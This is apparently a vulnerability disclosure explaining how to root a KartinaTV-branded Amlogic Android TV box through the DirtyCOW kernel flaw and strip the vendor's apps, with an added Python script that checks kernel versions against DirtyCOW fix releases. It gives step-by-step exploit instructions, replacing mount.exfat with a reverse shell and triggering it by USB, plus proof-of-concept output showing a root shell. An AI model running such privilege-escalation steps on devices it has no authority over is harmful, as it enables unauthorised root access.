FDEU-CVE-2025-2ff0
Summary
Unpatched old vulnerabilities in the KartinaTV firmware allow the device to be jailbroken and debloated.
Tech details
KartinaTV firmware 4.2.2.186_SB522 uses an outdated 3.10.33 kernel, which is vulnerable to DirtyCOW, allowing users to elevate privileges to root and bypass the vendor lock. After jailbreaking, the user can remove the pre-installed bloatware and use the device as a generic Android TV box without a subscription.
About KartinaTV
KartinaTV is an IPTV provider in Germany that mostly targets Eastern European users; all streamed TV channels are in Russian. The stream can be watched on a dedicated branded Android TV box that is sold separately.
Device overview

The device is a classic Android TV box based on the very popular low-cost quad-core Amlogic S805-B (Meson8B) CPU, with 1GB RAM, 4GB of flash storage, an Ethernet port, 2x USB and HDMI. The OEM is branded as Comigo and the model's codename is Quattro. The model name printed on the PCB is GA-ALS3F2.
Upon booting, the device starts Android and a custom launcher that requires an internet connection and an active subscription before the device can be used, which isn't fair: anyone should have the right to unlock their device and use it without a subscription as a standalone media player or home server.
As usual, we got the device on the aftermarket for very cheap and got our hands dirty.
Serial console

The PCB has a serial console port, but the header needs to be soldered on. No shell is available on the console.
Snip of a boot log:
Starting kernel ...
[ 0.000000@0] Booting Linux on physical CPU 0x200
[ 0.000000@0] Initializing cgroup subsys cpu
[ 0.000000@0] Initializing cgroup subsys cpuacct
[ 0.000000@0] Linux version 3.10.33-ga2a8750 (jenkins@build01) (gcc version 4.7.3 20130205 (prerelease) (crosstool-NG linaro-1.13.1-4.7-2013.02-01-20130221 - Linaro GCC 2013.02) ) #309 SMP PREEMPT Wed Apr 11 22:20:44 IDT 2018
[ 0.000000@0] CPU: ARMv7 Processor [410fc051] revision 1 (ARMv7), cr=10c5387d
[ 0.000000@0] CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
[ 0.000000@0] Machine: Amlogic Meson8B, model: AMLOGIC
[ 0.000000@0] physical memory start address is 0x200000
..
DirtyCOW
To elevate privileges, we can use the DirtyCOW vulnerability in the 3.10.33 kernel, which, in a nutshell, allows you to replace the contents of any file. The default way to exploit DirtyCOW is to replace the built-in Android binary run-as and then call it from an adb shell. In this case, however, adb is not available to the user, because the settings cannot be reached without first unlocking the launcher. We found, though, that it is possible to install an APK app, which gives at least access to a low-privileged shell.
To hack this device we replaced the mount.exfat system binary with a simple reverse shell. To trigger the exploit, all that is needed is to plug in a USB flash drive formatted as exFAT: this executes the mount.exfat binary as root with the highest SELinux context.
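A triage check an auditor can run over a captured boot log or `uname -a` output, added here as an example and not part of the original write-up: it extracts the kernel version and compares it with the first stable release of that branch that shipped the DirtyCOW (CVE-2016-5195) fix. The sample lines are constructed after the boot log above, and the fix-version table is assumed to match the kernel stable changelogs; as the code comments say, a "predates-fix" verdict is a lead for a patch audit, since vendor kernels often backport fixes without bumping the version string.

```python
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# Constructed sample lines, modelled on this write-up's boot log and uname output.
SAMPLE_BOOT_LOG = (
    "[ 0.000000@0] Initializing cgroup subsys cpuacct\n"
    "[ 0.000000@0] Linux version 3.10.33-ga2a8750 (jenkins@build01) "
    "(gcc version 4.7.3 20130205 (prerelease)) #309 SMP PREEMPT Wed Apr 11 22:20:44 IDT 2018\n"
    "[ 0.000000@0] CPU: ARMv7 Processor [410fc051] revision 1 (ARMv7), cr=10c5387d\n"
)
SAMPLE_UNAME = "Linux localhost 3.10.33-ga2a8750 #309 SMP PREEMPT armv7l GNU/Linux"

# First stable release of each branch that shipped the DirtyCOW (CVE-2016-5195) fix,
# assumed to match the kernel stable changelogs. Unlisted branches get no verdict.
DIRTYCOW_FIXED_IN = {(3, 10): (3, 10, 104), (4, 4): (4, 4, 26), (4, 7): (4, 7, 9), (4, 8): (4, 8, 3)}

_BOOT_RE = re.compile(r"Linux version (\d+)\.(\d+)\.(\d+)")
_UNAME_RE = re.compile(r"^Linux \S+ (\d+)\.(\d+)\.(\d+)", re.MULTILINE)

def parse_kernel_version(text: str) -> Optional[Version]:
    """Extract (major, minor, patch) from a boot log or `uname -a` output, or None."""
    m = _BOOT_RE.search(text) or _UNAME_RE.search(text)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)

def dirtycow_status(version: Version) -> str:
    """'predates-fix' means the version string is older than its branch's fix release.
    Vendor kernels often backport fixes without bumping the version, so treat that as a
    lead for a patch audit, not as proof that the device is exploitable."""
    branch = version[:2]
    if branch in DIRTYCOW_FIXED_IN:
        return "fixed" if version >= DIRTYCOW_FIXED_IN[branch] else "predates-fix"
    if branch > (4, 8):
        return "fixed"          # the fix was in mainline before 4.9 was released
    return "unknown-branch"     # consult the stable changelog for this branch

def triage(text: str) -> str:
    """One-call helper: parse the version out of captured text and classify it."""
    version = parse_kernel_version(text)
    return "no-version-found" if version is None else dirtycow_status(version)
```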
Steps to hack:
- Compile the reverse shell payload as a.out.
- Download the SimpleSSHD APK (get it from F-Droid under the name "org.galexander.sshd").
- Write the APK to a FAT32 formatted USB flash drive.
- After plugging in the USB flash drive, navigate to Files from the welcome screen.
- Find the APK, install it and run it from the final success screen.
- Connect via ssh, cd to "/data/local/tmp" and drop the exploit there.
- Execute the exploit and wait 10 seconds for it to finish.
- Plug in the exFAT USB flash drive.
- Run the built-in netcat to connect to the reverse shell and do your nasty things.
Exploit PoC
$ ssh 192.168.1.2 -p 2222
user@192.168.1.2's password:
~/data/org.galexander.sshd/files $ ./dirtycow a.out /system/bin/mount.exfat --no-pad
dcow a.out /system/bin/mount.exfat
[*] size 9648
[*] mmap 0x400ef000
[*] currently 0x400ef000=464c457f
[*] using /proc/self/mem method
[*] check thread starts, address 0x400ef000, size 9648
[*] madvise thread starts, address 0x400ef000, size 9648
[*] check thread stops, patch successful, iterations 1
[*] madvise thread stops, return code sum 0, iterations 39139
[*] /proc/self/mem 7438608 771
[*] finished pid=0 sees 0x400ef000=464c457f
~/data/org.galexander.sshd/files $ busybox nc -l -p 9999
id
uid=0(root) gid=0(root) context=u:r:init:s0
uname -a
Linux localhost 3.10.33-ga2a8750 #309 SMP PREEMPT Wed Apr 11 22:20:44 IDT 2018 armv7l GNU/Linux
Debloat
To remove the bloatware, use these commands in the root shell:
pm disable com.comigo.cloud
pm disable ru.start.kartinatv
pm disable com.comigo.kartina.kiosk
pm disable com.comigo.rootkeeper
pm disable com.comigo.welcome
pm disable com.comigo.remoteshellconnector
pm disable com.comigo.cloud.res
pm disable com.comigo.welcome
pm disable com.comigo.tr069client
pm disable com.comigo.applicationupdater
pm disable com.comigo.upgrader
pm disable com.comigo.tv
pm disable com.comigo.payment.stb
pm disable com.comigo.operator.stb
After that, reboot and you should be able to install a launcher app and use the TV box as a standard Android device.
Timeline
2025-11-01 - initial research
2025-12-12 - full disclosure